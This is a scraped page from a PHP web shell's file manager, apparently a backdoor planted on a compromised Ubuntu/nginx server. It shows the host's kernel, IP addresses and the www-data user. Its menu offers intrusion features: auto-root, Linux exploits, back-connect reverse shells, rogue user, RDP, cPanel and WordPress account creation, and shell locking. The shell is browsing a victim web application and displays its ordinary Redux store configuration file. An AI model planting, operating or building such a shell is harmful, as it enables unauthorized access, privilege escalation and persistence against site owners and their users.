Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-core-ui-code /
app /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxr-x
components
[ DIR ]
drwxrwxr-x
config
[ DIR ]
drwxrwxr-x
containers
[ DIR ]
drwxrwxr-x
helpers
[ DIR ]
drwxrwxr-x
images
[ DIR ]
drwxrwxr-x
service
[ DIR ]
drwxrwxr-x
styles
[ DIR ]
drwxrwxr-x
translations
[ DIR ]
drwxrwxr-x
types
[ DIR ]
drwxrwxr-x
ui
[ DIR ]
drwxrwxr-x
utils
[ DIR ]
drwxrwxr-x
.htaccess
1.75
KB
-rwxrwxr-x
.nginx.conf
3.21
KB
-rwxrwxr-x
app.tsx
4.28
KB
-rwxrwxr-x
configureStore.ts
2.21
KB
-rwxrwxr-x
global-styles.ts
658
B
-rwxrwxr-x
globals.d.tsx
214
B
-rwxrwxr-x
i18n.ts
1.26
KB
-rwxrwxr-x
index.html
1.26
KB
-rwxrwxr-x
locales.ts
95
B
-rwxrwxr-x
reducers.ts
9.12
KB
-rwxrwxr-x
saga.tsx
7.17
KB
-rwxrwxr-x
utils.d.ts
74
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : configureStore.ts
/** * Create the store with dynamic reducers */ import { applyMiddleware, createStore, compose } from 'redux'; import { routerMiddleware } from 'connected-react-router'; import { createInjectorsEnhancer, forceReducerReload } from 'redux-injectors'; import createSagaMiddleware from 'redux-saga'; import { History } from 'history'; import { composeWithDevTools } from 'redux-devtools-extension'; import createReducer from './reducers'; import rootSaga from './saga'; import { InjectedStore, ApplicationRootState } from 'types'; export default function configureStore( initialState: ApplicationRootState | {} = {}, history: History, ) { const reduxSagaMonitorOptions = {}; const sagaMiddleware = createSagaMiddleware(reduxSagaMonitorOptions); const { run: runSaga } = sagaMiddleware; // Create the store with two middlewares // 1. sagaMiddleware: Makes redux-sagas work // 2. routerMiddleware: Syncs the location/URL path to the state const middlewares = [sagaMiddleware, routerMiddleware(history)]; const enhancers = [ applyMiddleware(...middlewares), createInjectorsEnhancer({ createReducer, runSaga, }), ]; let enhancer; // If Redux Dev Tools and Saga Dev Tools Extensions are installed, enable them /* istanbul ignore next */ if (process.env.NODE_ENV !== 'production' && typeof window === 'object') { enhancer = composeWithDevTools(...enhancers); // NOTE: Uncomment the code below to restore support for Redux Saga // Dev Tools once it supports redux-saga version 1.x.x // if (window.__SAGA_MONITOR_EXTENSION__) // reduxSagaMonitorOptions = { // sagaMonitor: window.__SAGA_MONITOR_EXTENSION__, // }; } else { enhancer = compose(...enhancers); } const store = createStore( createReducer(), initialState, enhancer, ) as InjectedStore; // Extensions sagaMiddleware.run(rootSaga); store.runSaga = sagaMiddleware.run; store.injectedReducers = {}; // Reducer registry store.injectedSagas = {}; // Saga registry // Make reducers hot reloadable, see http://mxs.is/googmo /* istanbul ignore next */ if (module.hot) { module.hot.accept('./reducers', () => { forceReducerReload(store); }); } return store; }
Close